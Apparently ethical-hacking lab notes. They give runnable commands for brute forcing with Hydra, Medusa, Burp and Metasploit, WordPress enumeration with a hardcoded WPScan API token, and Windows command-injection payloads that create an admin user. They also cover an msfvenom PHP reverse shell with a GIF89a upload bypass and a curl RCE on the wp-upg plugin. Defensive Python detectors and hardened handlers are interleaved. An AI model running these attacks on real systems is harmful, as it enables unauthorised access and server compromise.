2. Perform Web Application Attacks
An ethical hacker or pen tester must test their company’s web application against various attacks and other vulnerabilities.
1. Brute force using Burp
Set the Burp proxy in the browser, intercept the login request, right-click it and send it to Intruder.
Clear the existing payload positions and mark the target fields:
Sniper if you are only brute-forcing the password.
Cluster bomb if you are brute-forcing both username and password.
Set the payload type and wordlists and start the attack. A response whose Length differs from the rest indicates the successful attempt.
Other brute-forcing tools
medusa -h 10.10.10.x -U /root/Documents/user_list.txt -P /root/Documents/pass_list.txt -M ftp -F
# -U and -P take a username file and a password file (lowercase -p would be a single password); -M selects the module; -F stops after the first valid pair
Hydra brute-force cheat sheet
# SSH
hydra -l username -P passlist.txt 192.168.0.100 ssh
# FTP
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100
# If the service isn't running on the default port, use -s
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221
# TELNET
hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet
# Login form
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
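The defender's view of the Hydra and Medusa runs above is a burst of failed logins from one source. The following detector, added here as an example and not part of the original notes, parses OpenSSH-style auth log lines (the sample lines are constructed, not a real capture) and flags a source IP that accumulates a threshold of failures inside a sliding window, noting any success from the same IP after the burst:

```python
"""Detect password-guessing bursts in sshd auth logs (added example, not from the page).

Input: syslog-style lines as written by OpenSSH, constructed here for the demo.
Output: per-source-IP findings when failures exceed a threshold inside a time window.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines (not a real capture). Syslog timestamps carry no year; we assume 2024.
SAMPLE_LOG = """\
Mar 10 12:00:01 web1 sshd[4120]: Failed password for invalid user admin from 192.168.0.200 port 51234 ssh2
Mar 10 12:00:02 web1 sshd[4121]: Failed password for invalid user admin from 192.168.0.200 port 51235 ssh2
Mar 10 12:00:02 web1 sshd[4122]: Failed password for root from 192.168.0.200 port 51236 ssh2
Mar 10 12:00:03 web1 sshd[4123]: Failed password for root from 192.168.0.200 port 51237 ssh2
Mar 10 12:00:03 web1 sshd[4124]: Failed password for root from 192.168.0.200 port 51238 ssh2
Mar 10 12:00:04 web1 sshd[4125]: Accepted password for deploy from 192.168.0.200 port 51239 ssh2
Mar 10 12:05:00 web1 sshd[4130]: Failed password for alice from 10.0.0.5 port 40001 ssh2
Mar 10 12:30:00 web1 sshd[4131]: Failed password for alice from 10.0.0.5 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line, year=2024):
    """Parse one sshd auth line into a dict, or return None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: finding} for every IP with >= threshold failures inside window_seconds."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "Failed"]
        start = 0
        # Sliding window over failure timestamps: advance 'start' until the window fits.
        for end in range(len(failures)):
            while (failures[end]["ts"] - failures[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                burst_end = failures[end]["ts"]
                # A successful login from the same IP after the burst is the high-priority signal:
                # it suggests one of the guessed credentials worked.
                success_after = [
                    e["user"] for e in evs if e["result"] == "Accepted" and e["ts"] >= burst_end
                ]
                findings[ip] = {
                    "failures_in_window": count,
                    "usernames": sorted({e["user"] for e in failures[start:end + 1]}),
                    "success_after_burst": success_after,
                }
                break
    return findings


if __name__ == "__main__":
    for ip, finding in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, finding)
```

The two slow failures from 10.0.0.5 (25 minutes apart) stay below the threshold, while 192.168.0.200 is flagged with five failures in two seconds followed by an accepted login for "deploy"; tune threshold and window to the service's normal failure rate before alerting on it.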
2. Parameter tampering using Burp
In the Proxy tab, open the Inspector panel, where each parameter's name and value are shown. Change a value, forward the request and observe how the response differs.
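Tampering succeeds when the server trusts a value the browser sent instead of resolving it itself. The following example is added here (it is not code from the original notes) and contrasts a checkout handler that trusts a client-supplied price with one that only accepts identifiers and looks the price up server-side; the catalogue and the form posts are constructed for the demo:

```python
"""Parameter tampering: trusting client-supplied values vs. resolving them server-side.
Added example (not from the page). The catalogue and the request dicts are constructed.
"""
from decimal import Decimal, InvalidOperation

# Server-side source of truth (constructed catalogue).
CATALOGUE = {"sku-100": Decimal("49.99"), "sku-200": Decimal("199.00")}


class TamperedRequest(Exception):
    """Raised when a request carries values the server cannot reconcile with its own data."""


def checkout_vulnerable(form):
    """Trusts 'price' and 'quantity' exactly as the browser (or Burp's Inspector) sent them."""
    price = Decimal(form["price"])
    qty = int(form["quantity"])
    return price * qty


def checkout_hardened(form):
    """Accepts only identifiers from the client.

    The price comes from the catalogue, the quantity is range-checked, and a submitted
    price that disagrees with the catalogue is treated as a tampering signal, not honoured.
    """
    sku = form.get("sku")
    if sku not in CATALOGUE:
        raise TamperedRequest(f"unknown sku {sku!r}")
    try:
        qty = int(form.get("quantity", "0"))
    except ValueError:
        raise TamperedRequest("quantity is not an integer")
    if not 1 <= qty <= 100:
        raise TamperedRequest(f"quantity {qty} out of range")
    price = CATALOGUE[sku]
    if "price" in form:
        try:
            submitted = Decimal(form["price"])
        except InvalidOperation:
            raise TamperedRequest("price is not a number")
        if submitted != price:
            # Hidden-field value was altered in transit: log it as an attack signal.
            raise TamperedRequest(f"submitted price {submitted} != catalogue price {price}")
    return price * qty


def rejected(form):
    """True if the hardened handler refuses the form (convenience for checks below)."""
    try:
        checkout_hardened(form)
        return False
    except TamperedRequest:
        return True


# Constructed: the original form post, and the same post after editing in Burp's Inspector.
ORIGINAL = {"sku": "sku-200", "price": "199.00", "quantity": "1"}
TAMPERED = {"sku": "sku-200", "price": "1.00", "quantity": "1"}
NEGATIVE = {"sku": "sku-200", "price": "199.00", "quantity": "-3"}

if __name__ == "__main__":
    print("vulnerable total for tampered post:", checkout_vulnerable(TAMPERED))
    print("hardened total for original post:", checkout_hardened(ORIGINAL))
    print("hardened rejects tampered post:", rejected(TAMPERED))
    print("hardened rejects negative quantity:", rejected(NEGATIVE))
```

The vulnerable handler happily charges 1.00 for the tampered post; the hardened one never uses the client's price at all, and the mismatch it detects is worth logging because it only occurs when someone edited the request.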

3. Identify XSS using PwnXss
python3 pwnxss.py -u http://testphp.vulnweb.com

4. Exploit parameter tampering with XSS
5. Perform CSRF attacks
WPSCAN
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://www.cavementech.com/ --plugins-detection aggressive --enumerate vp
Add --random-user-agent to reduce the chance of the scan being blocked by a firewall or WAF.
6. Hack a WordPress site with WPSCAN and Metasploit
Installation
sudo apt update && sudo apt install wpscan
wpscan --update
Enumerate WordPress users
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://cavementech.com/ --enumerate u
WPSCAN can be used to enumerate users (u), plugins (p), themes (t), vulnerable plugins (vp), etc.
wpscan --url http://cmnatics.playground/ --enumerate u,p,t,vp --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

Now launch Metasploit with its database backend
service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
Now set the options to brute-force the login
set PASS_FILE /usr/wordlist.txt
set RHOSTS 192.168.52.2
set RPORT 8080
set TARGETURI /    (base path of the WordPress install, not a full URL)
set USERNAME admin
run

WPSCAN brute forcing
wpscan --url http://cmnatics.playground --passwords rockyou.txt --usernames cmnatic --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY
7. Remote command execution to compromise a target server
Set up and complete the DVWA guides
Windows Command Injection
hostname
whoami
tasklist
taskkill /PID 3112 /F    (forcefully kills the process)
dir c:\
net user
net user test /add    (add a new user)
net localgroup Administrators test /add    (add the test user to the Administrators group)
net user test    (view the details of the user)
In DVWA's command injection page the extra command is chained after the IP address with a pipe; to find and read pin.txt:
| dir c:\
| type c:\pin.txt
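The pipe in the payloads above works because the application pastes the submitted text into a shell command string. The following example is added here (not DVWA's code and not from the original notes) to show the vulnerable pattern beside a hardened one: the vulnerable function returns the shell string it would run, the hardened one validates the input as an IP address and builds an argv list that is executed without a shell, so separators like `|` and `;` are never interpreted. The sample payload reuses the page's `type c:\pin.txt`; the separator, not the command, is what the check is about.

```python
"""Command injection in a 'ping' feature: shell string building vs. validated argv.
Added example, not from the page or DVWA's own code. The *_vulnerable/*_hardened functions
return what they would run so the difference is visible without executing anything.
"""
import ipaddress
import shlex
import subprocess


class RejectedInput(ValueError):
    """Raised when the submitted target is not a plain IP address."""


def ping_command_vulnerable(target):
    """Mirrors the DVWA 'low' pattern: user text is concatenated into a shell string.
    A '|' or ';' inside target becomes a second command when the shell parses it."""
    return f"ping -c 1 {target}"


def ping_argv_hardened(target):
    """Validate as an IP address, then pass it as a single argv element with no shell.
    (Hostnames would need their own strict allow-list check; this version accepts IPs only.)"""
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError:
        raise RejectedInput(f"not an IP address: {target!r}")
    return ["ping", "-c", "1", str(ip)]


def run_ping(target, timeout=5):
    """Execute the hardened form; shell=False means argv is never re-parsed by a shell."""
    argv = ping_argv_hardened(target)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout)


def command_count(command):
    """How many separate commands a POSIX shell would parse from a command string.
    Counts operator tokens the way sh does; used here only to illustrate the injection."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return 1 + sum(1 for tok in lexer if tok in ("|", ";", "&&", "||", "&"))


def rejected(target):
    """True if the hardened validator refuses the target."""
    try:
        ping_argv_hardened(target)
        return False
    except RejectedInput:
        return True


# Constructed inputs: a normal target and one carrying the page's pipe-chained command.
CLEAN = "127.0.0.1"
INJECTED = "127.0.0.1 | type c:\\pin.txt"

if __name__ == "__main__":
    for target in (CLEAN, INJECTED):
        cmd = ping_command_vulnerable(target)
        print(f"vulnerable would run {cmd!r} -> {command_count(cmd)} command(s)")
        print(f"hardened rejects {target!r}: {rejected(target)}")
```

Note that escaping characters in the vulnerable string (for example with `shlex.quote`) is a weaker fix than removing the shell entirely: the argv form has no parser in the path that could be confused, which is why the hardened version is the one to copy.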
8. Exploit File upload vulnerability
Generating the payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >exploit.php
Run multi/handler to catch the shell
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
run
Check the above DVWA walkthroughs. For the high security level, add the following line on top of the payload (a GIF file signature so the upload passes the image check) and save it as a .jpeg
GIF89a;
Now in command prompt, rename the file
copy C:\wamp64\www\DVWA\hackable\uploads\shell.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php
open the shell, and you will get the meterpreter session.
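The rename trick above works because the upload check only looks at the client-supplied extension and the first bytes of the file, and because the stored file keeps a name the attacker chose inside the web root. The validator below is an added example (not DVWA's code and not from the original notes) of an upload policy that does not fall to it: the extension allow-list and the sniffed content type must agree, script markers inside "image" data are rejected, and the server chooses both the stored name and the extension. The storage directory is assumed to sit outside the web root with no execute mapping; the sample files are constructed.

```python
"""Upload handling that resists the 'GIF89a; + .jpeg, then rename' trick.
Added example, not DVWA's code. Assumed policy: image uploads only, stored outside the
web root under a server-generated name, with the extension taken from verified content.
"""
import os
import secrets
from pathlib import Path

MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXT = {"png": "png", "jpg": "jpg", "jpeg": "jpg", "gif": "gif"}
# Any of these inside an 'image' means a polyglot; reject rather than trust the header.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")
MAX_BYTES = 2 * 1024 * 1024


class UploadRejected(Exception):
    """Raised with the reason an upload failed policy."""


def sniff_type(data):
    """Return the image kind the leading bytes claim, or None."""
    for kind, magics in MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return kind
    return None


def validate_upload(client_filename, data):
    """Return the server-chosen safe filename, or raise UploadRejected."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    # Only the final suffix counts; 'shell.php.jpeg' still ends in .jpeg, which is
    # exactly why the extension is never the deciding check on its own.
    suffix = Path(client_filename).suffix.lower().lstrip(".")
    if suffix not in ALLOWED_EXT:
        raise UploadRejected(f"extension .{suffix} not allowed")
    sniffed = sniff_type(data)
    if sniffed is None:
        raise UploadRejected("content is not a recognised image format")
    if sniffed != ALLOWED_EXT[suffix]:
        raise UploadRejected(f"extension says {suffix}, content says {sniffed}")
    if any(marker in data for marker in SCRIPT_MARKERS):
        raise UploadRejected("embedded script markers in image data")
    # The server picks both the name and the extension; the client's name is discarded.
    return f"{secrets.token_hex(16)}.{sniffed}"


def store_upload(client_filename, data, upload_dir):
    """Write under a random name into upload_dir (assumed outside the web root, no execute)."""
    safe_name = validate_upload(client_filename, data)
    dest = Path(upload_dir) / safe_name
    dest.write_bytes(data)
    os.chmod(dest, 0o640)
    return dest


def rejected(client_filename, data):
    """True if policy refuses the upload (convenience for checks below)."""
    try:
        validate_upload(client_filename, data)
        return False
    except UploadRejected:
        return True


# Constructed samples: a minimal GIF header and a header followed by a PHP open tag.
GOOD_GIF = b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00" * 20
POLYGLOT = b"GIF89a;<?php ?>"

if __name__ == "__main__":
    print("cat.gif stored as:", validate_upload("cat.gif", GOOD_GIF))
    for name, data in (("shell.jpeg", POLYGLOT), ("shell.gif", POLYGLOT), ("shell.php", GOOD_GIF)):
        print(f"{name}: rejected={rejected(name, data)}")
```

The "GIF89a;" prefix alone still passes the signature check, which is the point: signature sniffing is one layer, and the decisive controls are that the stored extension is derived from verified content, the name is unguessable, and the directory is never served with a script handler, so a later rename to .php has nothing to execute against.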
9. Exploit Log4j vulnerability
10. Perform Remote Code Execution (RCE) Attack
We will exploit an RCE vulnerability in a WordPress plugin.
In the terminal window, run the command wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token].
The result appears, displaying detailed information about the target website.
Scroll down to the Plugin(s) Identified section and observe the installed vulnerable plugin (wp-upg) on the target website.
In the Plugin(s) Identified section, under the wp-upg plugin, an Unauthenticated Remote Code Execution (RCE) vulnerability is reported, as shown in the screenshot.
The number of vulnerable plugins might differ when you perform this lab.
In this task, we will exploit the RCE vulnerability present in the wp-upg plugin.
To perform the RCE attack, run the command curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL'.
This curl command exploits the plugin vulnerability by sending a crafted request to admin-ajax.php; the plugin passes the field value to PHP's exec function, which lets an unauthenticated attacker run arbitrary system commands on the server.
In the last step the whoami command was executed, yielding the output nt authority\system.
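From the defender's side, the request above leaves a distinctive trace in the web server's access log: a GET to admin-ajax.php whose field parameter carries an exec directive. The detector below is an added example (not part of the original notes); the log lines are constructed in Apache combined format and include a URL-encoded variant to show that matching must happen after decoding, and the request pattern is the one quoted on this page:

```python
"""Spot wp-upg style admin-ajax.php abuse in web server access logs.
Added example, not from the page. Log lines are constructed in Apache combined format;
the request pattern (action=upg_datatable&field=field:exec:...) is the one quoted on this page.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: two exploitation attempts (one URL-encoded) and two benign admin-ajax calls.
SAMPLE_LOG = """\
10.10.1.13 - - [12/Mar/2024:10:01:12 +0000] "GET /CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL HTTP/1.1" 200 41 "-" "curl/8.4.0"
10.10.1.13 - - [12/Mar/2024:10:01:13 +0000] "GET /CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field%3Aexec%3Aid%3ANULL%3ANULL HTTP/1.1" 200 55 "-" "curl/8.4.0"
10.10.1.50 - - [12/Mar/2024:10:02:00 +0000] "POST /CEH/wp-admin/admin-ajax.php HTTP/1.1" 200 12 "http://10.10.1.22:8080/CEH/" "Mozilla/5.0"
10.10.1.50 - - [12/Mar/2024:10:02:05 +0000] "GET /CEH/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 30 "http://10.10.1.22:8080/CEH/" "Mozilla/5.0"
"""

# The page shows 'exec' as the directive; broaden the alternation if the plugin accepts others.
EXEC_FIELD_RE = re.compile(r"^field:exec:", re.I)


def parse_access_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def admin_ajax_findings(log_text):
    """Return one finding per request that drives upg_datatable with an exec field."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if not rec:
            continue
        url = urlsplit(rec["path"])
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(url.query)  # percent-decodes values, so %3A-encoded variants match too
        action = qs.get("action", [""])[0]
        field = qs.get("field", [""])[0]
        if action == "upg_datatable" and EXEC_FIELD_RE.match(field):
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "status": rec["status"],
                "field": field,
                "ua": rec["ua"],
                "no_referer": rec["referer"] == "-",
            })
    return findings


def exec_commands(findings):
    """The command each flagged request asked the plugin to run (third ':'-separated part)."""
    return [f["field"].split(":")[2] for f in findings]


if __name__ == "__main__":
    found = admin_ajax_findings(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["status"], f["field"], f["ua"])
    print("commands attempted:", exec_commands(found))
```

A 200 status on a flagged request means the command most likely ran, so those lines should be prioritised over blocked ones; the missing referer and a curl user agent are supporting context rather than the match itself. The durable fix is to remove or update the vulnerable plugin, and until then to block the action at the WAF or web server.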